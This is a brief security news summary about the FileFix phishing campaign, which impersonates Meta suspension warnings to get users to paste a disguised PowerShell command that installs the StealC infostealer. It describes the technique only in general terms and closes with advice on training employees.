A new variant of the ClickFix family of attacks, known as FileFix, has been discovered using social engineering tactics to trick users into installing malware. The attack impersonates Meta account suspension warnings and uses a phishing page with a disguised PowerShell command to install the StealC infostealer malware. This malware steals sensitive data such as credentials, cryptocurrency wallets, and cloud credentials.
The FileFix technique was created by a red team researcher and abuses the address bar in File Explorer to execute malicious commands. The attack has been used before, but this new campaign uses a multi-language phishing page and steganography to hide its payloads.
Acronis reports that multiple variants of the campaign were observed over two weeks, using different payloads, domains, and lures. The attackers are likely testing their infrastructure or adapting to improve their tactics.
To avoid falling victim to these attacks, organizations should educate their employees on new phishing tactics and the risks of copying data from a website into seemingly harmless system dialogs.
Source: https://www.bleepingcomputer.com/news/security/new-filefix-attack-uses-steganography-to-drop-stealc-malware